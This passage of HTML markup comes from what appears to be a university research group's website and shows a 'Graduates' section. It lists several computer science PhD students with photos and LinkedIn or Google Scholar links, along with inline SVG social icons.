   <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c61\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c61 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c128\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c128 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c129-outer\">\n            <div data-colibri-id=\"182-c129\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c129 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-862 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c62\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c62 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c63-outer\">\n            <div data-colibri-id=\"182-c63\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c63 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c64\" class=\"d-block style-854 style-local-182-c64 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg\" class=\"wp-image-1592 style-854-image style-local-182-c64-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c64-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c65\" class=\"h-global-transition-all h-heading style-850 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c65\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-text h-text-component style-851 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-902 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"style-855 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-849 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-901 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-853 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-856 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-852 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-857 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-854 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-902 style-local-182-c85 position-relative h-element\">\n                  